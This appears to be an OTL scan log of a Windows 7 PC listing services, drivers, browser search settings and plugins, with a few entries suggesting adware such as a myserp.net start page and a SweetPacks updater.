SRV - [2011/04/16 12:49:30 | 000,082,224 | ---- | M] (ElcomSoft Co. Ltd.) [On_Demand | Stopped] -- C:\Program Files (x86)\Elcomsoft Password Recovery\Elcomsoft Wireless Security Auditor\ewsaserv64.exe -- (EWSASERV)
SRV - [2010/06/01 14:31:28 | 002,804,568 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU)
SRV - [2010/05/21 01:28:36 | 000,140,272 | ---- | M] (CinemaNow, Inc.) [Auto | Running] -- C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe -- (CinemaNow Service)
SRV - [2010/04/13 08:57:58 | 000,013,336 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2010/04/03 15:01:24 | 000,246,520 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\HP Games\HP Game Console\GameConsoleService.exe -- (GameConsoleService)
SRV - [2010/03/18 13:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2010/03/18 11:57:02 | 002,320,920 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2010/03/18 11:56:56 | 000,268,824 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2010/02/19 13:37:14 | 000,517,096 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe -- (SwitchBoard)
SRV - [2009/06/10 13:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)


========== Driver Services (SafeList) ==========

DRV:64bit: - File not found [Kernel | On_Demand | Stopped] -- C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys -- (esgiguard)
DRV:64bit: - [2013/04/12 05:38:40 | 000,103,496 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ngvpn.sys -- (NgVpn)
DRV:64bit: - [2013/04/12 05:38:40 | 000,031,304 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nglog.sys -- (NgLog)
DRV:64bit: - [2013/04/12 05:38:40 | 000,028,744 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ngwfp.sys -- (NgWfp)
DRV:64bit: - [2013/04/12 05:38:40 | 000,026,184 | ---- | M] (Aventail Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ngfilter.sys -- (NgFilter)
DRV:64bit: - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:64bit: - [2013/02/11 20:12:06 | 000,019,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usb8023x.sys -- (usb_rndisx)
DRV:64bit: - [2012/10/22 13:02:44 | 000,154,464 | ---- | M] (AVG Technologies CZ, s.r.o. ) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgidsdrivera.sys -- (AVGIDSDriver)
DRV:64bit: - [2012/10/15 03:48:50 | 000,063,328 | ---- | M] (AVG Technologies CZ, s.r.o. ) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\avgidsha.sys -- (AVGIDSHA)
DRV:64bit: - [2012/10/05 03:32:50 | 000,111,456 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgmfx64.sys -- (Avgmfx64)
DRV:64bit: - [2012/10/02 03:30:38 | 000,185,696 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\avgldx64.sys -- (Avgldx64)
DRV:64bit: - [2012/09/21 03:46:04 | 000,200,032 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgtdia.sys -- (Avgtdia)
DRV:64bit: - [2012/09/21 03:46:00 | 000,225,120 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\avgloga.sys -- (Avgloga)
DRV:64bit: - [2012/09/14 03:05:18 | 000,040,800 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgrkx64.sys -- (Avgrkx64)
DRV:64bit: - [2012/08/23 06:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2012/08/23 06:07:35 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2012/08/20 15:48:50 | 000,019,032 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\pwdrvio.sys -- (pwdrvio)
DRV:64bit: - [2012/08/20 15:48:48 | 000,012,384 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\pwdspio.sys -- (pwdspio)
DRV:64bit: - [2012/02/29 22:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(5).sys -- (WsAudio_DeviceS(5)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(4).sys -- (WsAudio_DeviceS(4)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(3).sys -- (WsAudio_DeviceS(3)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(2).sys -- (WsAudio_DeviceS(2)
DRV:64bit: - [2011/12/19 15:41:32 | 000,029,288 | ---- | M] (Wondershare) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WsAudio_DeviceS(1).sys -- (WsAudio_DeviceS(1)
DRV:64bit: - [2011/11/28 14:51:44 | 000,033,872 | ---- | M] (AnvSoft Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\anvsnddrv.sys -- (anvsnddrv)
DRV:64bit: - [2011/10/14 03:37:44 | 000,396,848 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:64bit: - [2011/09/05 20:04:00 | 000,243,744 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:64bit: - [2011/05/09 17:09:00 | 000,122,368 | ---- | M] (Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CT_U_USBSER.sys -- (Generalusbserialser20675)
DRV:64bit: - [2011/03/10 22:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/10 22:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/12/16 14:58:14 | 000,040,816 | ---- | M] (Elaborate Bytes AG) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ElbyCDIO.sys -- (ElbyCDIO)
DRV:64bit: - [2010/12/01 11:06:31 | 000,125,512 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AnyDVD.sys -- (AnyDVD)
DRV:64bit: - [2010/11/20 05:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 01:37:42 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2010/09/23 00:36:48 | 000,048,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2010/09/01 23:52:50 | 003,065,408 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)
DRV:64bit: - [2010/08/02 11:14:48 | 000,032,880 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\clwvd.sys -- (clwvd)
DRV:64bit: - [2010/07/28 20:10:42 | 010,610,400 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2010/05/31 11:46:50 | 000,333,928 | ---- | M] (Realtek ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2010/04/13 09:44:22 | 000,540,696 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2010/02/03 06:38:30 | 000,271,872 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2009/09/17 12:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/07/13 17:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 17:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 17:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 16:39:20 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDPrint.sys -- (WSDPrintDevice)
DRV:64bit: - [2009/07/13 16:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2009/06/19 18:09:57 | 001,394,688 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2009/06/10 13:01:11 | 001,485,312 | ---- | M] (Conexant Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VSTDPV6.SYS -- (SrvHsfV92)
DRV:64bit: - [2009/06/10 13:01:11 | 000,740,864 | ---- | M] (Conexant Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VSTCNXT6.SYS -- (SrvHsfWinac)
DRV:64bit: - [2009/06/10 13:01:11 | 000,292,864 | ---- | M] (Conexant Systems, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VSTAZL6.SYS -- (SrvHsfHDA)
DRV:64bit: - [2009/06/10 13:01:06 | 001,146,880 | ---- | M] (LSI Corp) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\agrsm64.sys -- (AgereSoftModem)
DRV:64bit: - [2009/06/10 12:35:33 | 000,389,120 | ---- | M] (Marvell) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\yk62x64.sys -- (yukonw7)
DRV:64bit: - [2009/06/10 12:35:28 | 005,434,368 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netw5v64.sys -- (netw5v64)
DRV:64bit: - [2009/06/10 12:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 12:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 12:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 12:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV:64bit: - [2007/02/15 16:57:06 | 000,040,648 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ElbyCDFL.sys -- (ElbyCDFL)
DRV - [2010/12/01 11:06:31 | 000,125,512 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysWOW64\drivers\AnyDVD.sys -- (AnyDVD)
DRV - [2010/01/28 13:46:44 | 000,021,248 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Motive\MREMP50.sys -- (MREMP50)
DRV - [2010/01/28 13:46:42 | 000,020,096 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Motive\MRESP50.sys -- (MRESP50)
DRV - [2009/09/22 17:39:56 | 000,225,280 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV - [2009/07/13 17:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
DRV - [2007/02/15 16:57:06 | 000,040,648 | ---- | M] (SlySoft, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysWOW64\drivers\ElbyCDFL.sys -- (ElbyCDFL)
DRV - [1999/09/10 12:06:00 | 000,025,244 | ---- | M] (Adaptec) [Kernel | System | Stopped] -- C:\Windows\SysWow64\drivers\ASPI32.SYS -- (ASPI32)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE:64bit: - HKLM\..\SearchScopes,DefaultScope =
IE:64bit: - HKLM\..\SearchScopes\{4C6AB4BD-96D7-4335-97AB-C4588C2427C2}: "URL" = http://en.wikipedia....h={searchTerms}
IE:64bit: - HKLM\..\SearchScopes\{4FDD993D-F656-4134-8E18-AFCCC84F8912}: "URL" = http://search.yahoo....psg&type=HPNTDF
IE:64bit: - HKLM\..\SearchScopes\{CB469F30-480D-4846-B7EB-63F186F828BD}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://myserp.net/?s...=hp&w=1&t=7&s=1
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope =
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\..\SearchScopes\{5FB49AFC-8016-4EB2-A383-78E96790C85E}: "URL" = http://www.google.co...ie=utf8&oe=utf8
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searc}
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

========== FireFox ==========

FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.enabledAddons: %7B2A47DBFD-567F-4159-AD6A-B0D9CF6CCDFC%7D:2.0
FF - prefs.js..extensions.enabledAddons: %7B8f02605d-be4e-41ba-bd00-c39a59c46919%7D:10.22.5.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:24.0
FF - user.js - File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_152.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_152.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/Lync,version=15.0: C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@real.com/nppl3260;version=6.0.12.450: C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nprpjplug;version=6.0.12.448: C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll (RealNetworks, Inc.)
FF - HKLM\Software\MozillaPlugins\@real.com/nsJSRealPlayerPlugin;version=: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Jon Lowry\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Jon Lowry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{C4CFC0DE-134F-4466-B2A2-FF7C59A8BFAD}: C:\PROGRAM FILES\UPDATER BY SWEETPACKS\FIREFOX
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}: C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension\ [2011/01/26 14:53:54 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\html5video [2011/06/04 05:43:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6904342A-8307-11DF-A508-4AE2DFD72085}: C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\wpa [2011/06/04 05:43:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\PROGRA~1\AVASTS~1\Avast\WebRep\FF [2013/12/06 15:39:12 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 24.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/10/05 21:14:19 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 24.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013/12/06 15:04:48 | 000,000,000 | ---D | M]

[2013/08/29 06:43:03 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Extensions
[2012/03/27 18:27:55 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Extensions\songbird@songbirdnest.com
[2013/12/07 18:27:28 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\extensions
[2013/10/05 21:14:19 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\Extensions
[2013/12/05 23:39:50 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2013/10/05 21:14:29 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
File not found (No name found) -- C:\USERS\JON LOWRY\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\8MZBHQ3R.DEFAULT\EXTENSIONS\{2A47DBFD-567F-4159-AD6A-B0D9CF6CCDFC}
File not found (No name found) -- C:\USERS\JON LOWRY\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\8MZBHQ3R.DEFAULT\EXTENSIONS\{8F02605D-BE4E-41BA-BD00-C39A59C46919}
[2013/10/17 11:25:52 | 000,034,072 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll
[2011/03/10 08:58:36 | 000,002,201 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\scenicreflectionstb.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\pdf.dll
CHR - plugin: Microsoft\u00AE Windows Media Player Firefox Plugin (Enabled) = C:\Users\Jon Lowry\AppData\Roaming\Mozilla\plugins\np-mswmp.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
CHR - plugin: AVG SiteSafety plugin (Disabled) = C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.5.0\\npsitesafety.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Web Player (Enabled) = C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Earth Plugin (Enabled) = C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
CHR - plugin: Picasa (Enabled) = C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll
